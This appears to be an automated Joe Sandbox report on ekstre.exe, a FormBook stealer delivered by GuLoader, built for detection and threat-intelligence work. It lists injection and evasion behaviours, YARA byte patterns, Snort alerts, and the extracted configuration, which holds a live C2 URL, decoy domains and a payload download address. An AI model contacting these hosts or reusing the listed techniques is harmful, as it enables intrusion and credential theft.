Edit tour

Windows Analysis Report
ekstre.exe

Overview

General Information

Sample Name:	ekstre.exe
Analysis ID:	837866
MD5:	6f2c2220fcdbb75d33aea719a1b55b24
SHA1:	9246276df38b3c2dff316dd432928bb709caf88c
SHA256:	86d7bb37384646a755a03c2f6e743483ee40d5af6f018824e89c54a9308ceecf
Infos:

Detection

FormBook, GuLoader

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Multi AV Scanner detection for submitted file

Yara detected FormBook

Malicious sample detected (through community Yara rule)

System process connects to network (likely due to code injection or exploit)

Antivirus detection for URL or domain

Yara detected GuLoader

Snort IDS alert for network traffic

Sample uses process hollowing technique

Uses netstat to query active network connections and open ports

Maps a DLL or memory area into another process

Tries to detect Any.run

Machine Learning detection for sample

Modifies the prolog of user mode functions (user mode inline hooks)

Queues an APC in another process (thread injection)

Modifies the context of a thread in another process (thread injection)

C2 URLs / IPs found in malware configuration

Uses 32bit PE files

Yara signature match

Antivirus or Machine Learning detection for unpacked file

May sleep (evasive loops) to hinder dynamic analysis

Contains functionality to shutdown / reboot the system

Creates files inside the system directory

PE file contains sections with non-standard names

Internet Provider seen in connection with other malware

Detected potential crypto function

Found potential string decryption / allocating functions

Sample execution stops while process was sleeping (likely an evasion)

Contains functionality to call native functions

Contains functionality to dynamically determine API calls

Found dropped PE file which has not been started or loaded

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Contains functionality for execution timing, often used to detect debuggers

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Sample file is different than original file name gathered from version info

Drops PE files

Tries to load missing DLLs

Contains functionality to read the PEB

Uses a known web browser user agent for HTTP communication

Checks if the current process is being debugged

Found large amount of non-executed APIs

Creates a process in suspended mode (likely to inject code)

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

System is w10x64native

ekstre.exe (PID: 7268 cmdline: C:\Users\user\Desktop\ekstre.exe MD5: 6F2C2220FCDBB75D33AEA719A1B55B24)

ekstre.exe (PID: 6096 cmdline: C:\Users\user\Desktop\ekstre.exe MD5: 6F2C2220FCDBB75D33AEA719A1B55B24)

explorer.exe (PID: 4940 cmdline: C:\Windows\Explorer.EXE MD5: 5EA66FF5AE5612F921BC9DA23BAC95F7)

NETSTAT.EXE (PID: 1708 cmdline: C:\Windows\SysWOW64\NETSTAT.EXE MD5: 9DB170ED520A6DD57B5AC92EC537368A)

cmd.exe (PID: 9972 cmdline: /c del "C:\Users\user\Desktop\ekstre.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 3024 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Formbook, Formbo	FormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.	SWEED Cobalt	http://blog.inquest.net/blog/2018/06/22/a-look-at-formbook-stealer/ http://cambuz.blogspot.de/2016/06/form-grabber-2016-cromeffoperathunderbi.html http://www.vkremez.com/2018/01/lets-learn-dissecting-formbook.html https://asec.ahnlab.com/en/32149/ https://blog.360totalsecurity.com/en/bayworld-event-cyber-attack-against-foreign-trade-industry/	https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Name	Description	Attribution	Blogpost URLs	Link
CloudEyE, GuLoader	CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.	No Attribution	https://0x00sec.org/t/analyzing-modern-malware-techniques-part-3/18943 https://blog.malwarebytes.com/scams/2020/08/sba-phishing-scams-from-malware-to-advanced-social-engineering/ https://blog.morphisec.com/guloader-the-rat-downloader https://blog.vincss.net/2020/05/re014-guloader-antivm-techniques.html https://cert-agid.gov.it/news/malware/tecniche-per-semplificare-lanalisi-del-malware-guloader/	https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.crosswalkconsulting.co.uk/mi94/"], "decoy": ["realdigitalmarketing.co.uk", "athle91.com", "zetuinteriors.africa", "jewelry2adore.biz", "sneakersuomo.com", "hotcoa.com", "bestpetfinds.com", "elatedfreedom.com", "louisegoulet.com", "licensescape.com", "jenniferfalconerrealtor.com", "xqan.net", "textare.net", "doctorlinkscsk.link", "bizformspro.com", "ameriealthcaritasfl.com", "hanfengmeiye.com", "anjin98.com", "credit-cards-54889.com", "dinero.news", "naijastudy.africa", "cursosweb22.online", "furniture-61686.com", "furniture-42269.com", "emiu6696.com", "herhustlenation.com", "kevinjasperinc.africa", "hear-aid-92727.com", "goodlifeprojectofficial.com", "freshteak.com", "bellvaniamail.com", "peterslawonline.com", "analogfair.com", "fornettobarbecues.com", "6880365.com", "couragetokingdom.com", "luivix.online", "3ay82.xyz", "tmcgroup.africa", "canadianbreederprogram.com", "funtime28.online", "customcarpentry.uk", "anotherworldrecord.com", "aux100000epices.com", "edelman-production.com", "honorproduct.com", "danuzioneto.com", "iltuosentiero.com", "healthinsurancearena.com", "hunterboots--canada.com", "irestoreart.com", "lapalmaaccesible.com", "khbmfbank.africa", "laxmi.digital", "leqidt.tax", "fluffyjet.online", "chuckclouds.com", "bril-kre-l25.buzz", "centracul.online", "legacyengravers.com", "guesstheword.net", "ded-morozvrn.online", "lemonga.com", "crrgbb.com"]}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000003.00000002.5841711739.00000000028C0000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000003.00000002.5841711739.00000000028C0000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000003.00000002.5841711739.00000000028C0000.00000040.10000000.00040000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18839:$sqlite3step: 68 34 1C 7B E1 0x1894c:$sqlite3step: 68 34 1C 7B E1 0x18868:$sqlite3text: 68 38 2A 90 C5 0x1898d:$sqlite3text: 68 38 2A 90 C5 0x1887b:$sqlite3blob: 68 53 D8 7F 8C 0x189a3:$sqlite3blob: 68 53 D8 7F 8C
00000003.00000002.5841711739.00000000028C0000.00000040.10000000.00040000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x156a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x157a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1591f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa58a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1440c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb283:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b917:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c91a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000003.00000002.5841711739.00000000028C0000.00000040.10000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6251:$a1: 3C 30 50 4F 53 54 74 09 40 0x1cbb0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa9bf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x158a7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
00000003.00000002.5842627078.00000000028F0000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000003.00000002.5842627078.00000000028F0000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000003.00000002.5842627078.00000000028F0000.00000004.00000800.00020000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18839:$sqlite3step: 68 34 1C 7B E1 0x1894c:$sqlite3step: 68 34 1C 7B E1 0x18868:$sqlite3text: 68 38 2A 90 C5 0x1898d:$sqlite3text: 68 38 2A 90 C5 0x1887b:$sqlite3blob: 68 53 D8 7F 8C 0x189a3:$sqlite3blob: 68 53 D8 7F 8C
00000003.00000002.5842627078.00000000028F0000.00000004.00000800.00020000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x156a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x157a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1591f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa58a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1440c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb283:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b917:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c91a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000003.00000002.5842627078.00000000028F0000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6251:$a1: 3C 30 50 4F 53 54 74 09 40 0x1cbb0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa9bf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x158a7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
00000001.00000002.1211195080.00000000000A0000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000001.00000002.1211195080.00000000000A0000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000001.00000002.1211195080.00000000000A0000.00000040.10000000.00040000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18839:$sqlite3step: 68 34 1C 7B E1 0x1894c:$sqlite3step: 68 34 1C 7B E1 0x18868:$sqlite3text: 68 38 2A 90 C5 0x1898d:$sqlite3text: 68 38 2A 90 C5 0x1887b:$sqlite3blob: 68 53 D8 7F 8C 0x189a3:$sqlite3blob: 68 53 D8 7F 8C
00000001.00000002.1211195080.00000000000A0000.00000040.10000000.00040000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x156a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x157a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1591f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa58a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1440c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb283:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b917:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c91a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000001.00000002.1211195080.00000000000A0000.00000040.10000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6251:$a1: 3C 30 50 4F 53 54 74 09 40 0x1cbb0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa9bf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x158a7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
00000003.00000002.5838086989.0000000000370000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000003.00000002.5838086989.0000000000370000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000003.00000002.5838086989.0000000000370000.00000040.80000000.00040000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18839:$sqlite3step: 68 34 1C 7B E1 0x1894c:$sqlite3step: 68 34 1C 7B E1 0x18868:$sqlite3text: 68 38 2A 90 C5 0x1898d:$sqlite3text: 68 38 2A 90 C5 0x1887b:$sqlite3blob: 68 53 D8 7F 8C 0x189a3:$sqlite3blob: 68 53 D8 7F 8C
00000003.00000002.5838086989.0000000000370000.00000040.80000000.00040000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x156a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x157a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1591f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa58a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1440c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb283:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b917:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c91a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000003.00000002.5838086989.0000000000370000.00000040.80000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6251:$a1: 3C 30 50 4F 53 54 74 09 40 0x1cbb0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa9bf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x158a7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
00000001.00000002.1274181140.0000000033DE0000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000001.00000002.1274181140.0000000033DE0000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000001.00000002.1274181140.0000000033DE0000.00000040.10000000.00040000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18839:$sqlite3step: 68 34 1C 7B E1 0x1894c:$sqlite3step: 68 34 1C 7B E1 0x18868:$sqlite3text: 68 38 2A 90 C5 0x1898d:$sqlite3text: 68 38 2A 90 C5 0x1887b:$sqlite3blob: 68 53 D8 7F 8C 0x189a3:$sqlite3blob: 68 53 D8 7F 8C
00000001.00000002.1274181140.0000000033DE0000.00000040.10000000.00040000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x156a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x157a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1591f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa58a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1440c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb283:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b917:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c91a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000001.00000002.1274181140.0000000033DE0000.00000040.10000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6251:$a1: 3C 30 50 4F 53 54 74 09 40 0x1cbb0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa9bf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x158a7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
00000002.00000002.5864084304.000000000A65C000.00000040.80000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_772cc62d	unknown	unknown	0xb52:$a2: pass 0xb58:$a3: email 0xb5f:$a4: login 0xb66:$a5: signin 0xb77:$a6: persistent 0xd4a:$r1: C:\Users\user\AppData\Roaming\60PBO7E5\60Plog.ini
00000000.00000002.1120014869.0000000000AAB000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_GuLoader_3	Yara detected GuLoader	Joe Security
00000000.00000002.1121676289.00000000066D6000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_GuLoader_2	Yara detected GuLoader	Joe Security
Process Memory Space: ekstre.exe PID: 6096	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x197b41:$a1: 3C 30 50 4F 53 54 74 09 40
Process Memory Space: NETSTAT.EXE PID: 1708	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x30f:$a1: 3C 30 50 4F 53 54 74 09 40 0x3ea7a:$a1: 3C 30 50 4F 53 54 74 09 40 0x4c40d:$a1: 3C 30 50 4F 53 54 74 09 40
Click to see the 25 entries

Snort Signatures

ET TROJAN FormBook CnC Checkin (GET) - Source IP: 192.168.11.20 - Destination IP: 185.53.179.90

Timestamp:	192.168.11.20185.53.179.9049806802031412 03/30/23-10:39:18.251061
SID:	2031412
Source Port:	49806
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN FormBook CnC Checkin (GET) - Source IP: 192.168.11.20 - Destination IP: 185.53.179.90

Timestamp:	192.168.11.20185.53.179.9049806802031453 03/30/23-10:39:18.251061
SID:	2031453
Source Port:	49806
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN FormBook CnC Checkin (GET) - Source IP: 192.168.11.20 - Destination IP: 23.227.38.74

Timestamp:	192.168.11.2023.227.38.7449811802031449 03/30/23-10:41:01.465366
SID:	2031449
Source Port:	49811
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN FormBook CnC Checkin (GET) - Source IP: 192.168.11.20 - Destination IP: 76.223.105.230

Timestamp:	192.168.11.2076.223.105.23049821802031453 03/30/23-10:42:03.452019
SID:	2031453
Source Port:	49821
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN FormBook CnC Checkin (GET) - Source IP: 192.168.11.20 - Destination IP: 23.227.38.74

Timestamp:	192.168.11.2023.227.38.7449828802031449 03/30/23-10:43:24.739881
SID:	2031449
Source Port:	49828
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Generic .bin download from Dotted Quad - Source IP: 192.168.11.20 - Destination IP: 34.138.169.8

Timestamp:	192.168.11.2034.138.169.849790802018752 03/30/23-10:36:18.142751
SID:	2018752
Source Port:	49790
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN FormBook CnC Checkin (GET) - Source IP: 192.168.11.20 - Destination IP: 23.227.38.74

Timestamp:	192.168.11.2023.227.38.7449811802031412 03/30/23-10:41:01.465366
SID:	2031412
Source Port:	49811
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN FormBook CnC Checkin (GET) - Source IP: 192.168.11.20 - Destination IP: 76.223.105.230

Timestamp:	192.168.11.2076.223.105.23049821802031449 03/30/23-10:42:03.452019
SID:	2031449
Source Port:	49821
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN FormBook CnC Checkin (GET) - Source IP: 192.168.11.20 - Destination IP: 23.227.38.74

Timestamp:	192.168.11.2023.227.38.7449828802031412 03/30/23-10:43:24.739881
SID:	2031412
Source Port:	49828
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN FormBook CnC Checkin (GET) - Source IP: 192.168.11.20 - Destination IP: 23.227.38.74

Timestamp:	192.168.11.2023.227.38.7449811802031453 03/30/23-10:41:01.465366
SID:	2031453
Source Port:	49811
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN FormBook CnC Checkin (GET) - Source IP: 192.168.11.20 - Destination IP: 23.227.38.74

Timestamp:	192.168.11.2023.227.38.7449828802031453 03/30/23-10:43:24.739881
SID:	2031453
Source Port:	49828
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN FormBook CnC Checkin (GET) - Source IP: 192.168.11.20 - Destination IP: 185.53.179.90

Timestamp:	192.168.11.20185.53.179.9049806802031449 03/30/23-10:39:18.251061
SID:	2031449
Source Port:	49806
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN FormBook CnC Checkin (GET) - Source IP: 192.168.11.20 - Destination IP: 76.223.105.230

Timestamp:	192.168.11.2076.223.105.23049821802031412 03/30/23-10:42:03.452019
SID:	2031412
Source Port:	49821
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for submitted file

Source: ekstre.exe	ReversingLabs: Detection: 29%
Source: ekstre.exe	Virustotal: Detection: 41%			Perma Link

Yara detected FormBook

Source: Yara match	File source: 00000003.00000002.5841711739.00000000028C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.5842627078.00000000028F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.1211195080.00000000000A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.5838086989.0000000000370000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.1274181140.0000000033DE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

Antivirus detection for URL or domain

Source: http://34.138.169.8/wp-content/themes/seotheme/RenHLfAoTIbu98.bin(	Avira URL Cloud: Label: malware
Source: http://34.138.169.8/wp-content/themes/seotheme/RenHLfAoTIbu98.binx	Avira URL Cloud: Label: malware
Source: http://34.138.169.8/wp-content/themes/seotheme/RenHLfAoTIbu98.binf	Avira URL Cloud: Label: malware
Source: http://34.138.169.8/wp-content/themes/seotheme/RenHLfAoTIbu98.binT	Avira URL Cloud: Label: malware
Source: http://34.138.169.8/wp-content/themes/seotheme/RenHLfAoTIbu98.binP	Avira URL Cloud: Label: malware
Source: http://34.138.169.8/wp-content/themes/seotheme/RenHLfAoTIbu98.bin	Avira URL Cloud: Label: malware

Machine Learning detection for sample

Source: ekstre.exe

Joe Sandbox ML: detected

Source: 3.2.NETSTAT.EXE.2972868.1.unpack

Avira: Label: TR/Patched.Ren.Gen

Source: 00000003.00000002.5841711739.00000000028C0000.00000040.10000000.00040000.00000000.sdmp

Malware Configuration Extractor: FormBook {"C2 list": ["www.crosswalkconsulting.co.uk/mi94/"], "decoy": ["realdigitalmarketing.co.uk", "athle91.com", "zetuinteriors.africa", "jewelry2adore.biz", "sneakersuomo.com", "hotcoa.com", "bestpetfinds.com", "elatedfreedom.com", "louisegoulet.com", "licensescape.com", "jenniferfalconerrealtor.com", "xqan.net", "textare.net", "doctorlinkscsk.link", "bizformspro.com", "ameriealthcaritasfl.com", "hanfengmeiye.com", "anjin98.com", "credit-cards-54889.com", "dinero.news", "naijastudy.africa", "cursosweb22.online", "furniture-61686.com", "furniture-42269.com", "emiu6696.com", "herhustlenation.com", "kevinjasperinc.africa", "hear-aid-92727.com", "goodlifeprojectofficial.com", "freshteak.com", "bellvaniamail.com", "peterslawonline.com", "analogfair.com", "fornettobarbecues.com", "6880365.com", "couragetokingdom.com", "luivix.online", "3ay82.xyz", "tmcgroup.africa", "canadianbreederprogram.com", "funtime28.online", "customcarpentry.uk", "anotherworldrecord.com", "aux100000epices.com", "edelman-production.com", "honorproduct.com", "danuzioneto.com", "iltuosentiero.com", "healthinsurancearena.com", "hunterboots--canada.com", "irestoreart.com", "lapalmaaccesible.com", "khbmfbank.africa", "laxmi.digital", "leqidt.tax", "fluffyjet.online", "chuckclouds.com", "bril-kre-l25.buzz", "centracul.online", "legacyengravers.com", "guesstheword.net", "ded-morozvrn.online", "lemonga.com", "crrgbb.com"]}

Source: ekstre.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: C:\Users\user\Desktop\ekstre.exe

Registry value created: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Andetkamres

Jump to behavior

Source: ekstre.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: netstat.pdbGCTL source: ekstre.exe, 00000001.00000003.1209608875.0000000003F8B000.00000004.00000020.00020000.00000000.sdmp, ekstre.exe, 00000001.00000003.1209497067.0000000003F94000.00000004.00000020.00020000.00000000.sdmp, ekstre.exe, 00000001.00000002.1211482335.00000000000D0000.00000040.10000000.00040000.00000000.sdmp, ekstre.exe, 00000001.00000002.1261571848.0000000003F8B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: MapiProxy.pdb source: ekstre.exe, 00000000.00000002.1117622927.0000000000791000.00000004.00000001.01000000.00000003.sdmp, MapiProxy_InUse.dll.0.dr
Source:	Binary string: mshtml.pdb source: ekstre.exe, 00000001.00000001.981438331.0000000000649000.00000020.00000001.01000000.00000006.sdmp
Source:	Binary string: netstat.pdb source: ekstre.exe, 00000001.00000003.1209608875.0000000003F8B000.00000004.00000020.00020000.00000000.sdmp, ekstre.exe, 00000001.00000003.1209497067.0000000003F94000.00000004.00000020.00020000.00000000.sdmp, ekstre.exe, 00000001.00000002.1211482335.00000000000D0000.00000040.10000000.00040000.00000000.sdmp, ekstre.exe, 00000001.00000002.1261571848.0000000003F8B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: MapiProxy.pdb@ source: ekstre.exe, 00000000.00000002.1117622927.0000000000791000.00000004.00000001.01000000.00000003.sdmp, MapiProxy_InUse.dll.0.dr
Source:	Binary string: wntdll.pdbUGP source: ekstre.exe, 00000001.00000002.1275559957.000000003426D000.00000040.00001000.00020000.00000000.sdmp, ekstre.exe, 00000001.00000003.1061058941.0000000033DEA000.00000004.00000020.00020000.00000000.sdmp, ekstre.exe, 00000001.00000003.1065874723.0000000033F97000.00000004.00000020.00020000.00000000.sdmp, ekstre.exe, 00000001.00000002.1275559957.0000000034140000.00000040.00001000.00020000.00000000.sdmp, NETSTAT.EXE, 00000003.00000003.1210472204.0000000002A68000.00000004.00000020.00020000.00000000.sdmp, NETSTAT.EXE, 00000003.00000003.1215143530.0000000002C66000.00000004.00000020.00020000.00000000.sdmp, NETSTAT.EXE, 00000003.00000002.5846532998.0000000002F3D000.00000040.00001000.00020000.00000000.sdmp, NETSTAT.EXE, 00000003.00000002.5846532998.0000000002E10000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: ekstre.exe, ekstre.exe, 00000001.00000002.1275559957.000000003426D000.00000040.00001000.00020000.00000000.sdmp, ekstre.exe, 00000001.00000003.1061058941.0000000033DEA000.00000004.00000020.00020000.00000000.sdmp, ekstre.exe, 00000001.00000003.1065874723.0000000033F97000.00000004.00000020.00020000.00000000.sdmp, ekstre.exe, 00000001.00000002.1275559957.0000000034140000.00000040.00001000.00020000.00000000.sdmp, NETSTAT.EXE, 00000003.00000003.1210472204.0000000002A68000.00000004.00000020.00020000.00000000.sdmp, NETSTAT.EXE, 00000003.00000003.1215143530.0000000002C66000.00000004.00000020.00020000.00000000.sdmp, NETSTAT.EXE, 00000003.00000002.5846532998.0000000002F3D000.00000040.00001000.00020000.00000000.sdmp, NETSTAT.EXE, 00000003.00000002.5846532998.0000000002E10000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: mshtml.pdbUGP source: ekstre.exe, 00000001.00000001.981438331.0000000000649000.00000020.00000001.01000000.00000006.sdmp

Source: C:\Users\user\Desktop\ekstre.exe	Code function: 0_2_004059F6 GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,		0_2_004059F6
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 0_2_004065AB FindFirstFileA,FindClose,		0_2_004065AB

Source: C:\Users\user\Desktop\ekstre.exe	File opened: C:\Users\user	Jump to behavior
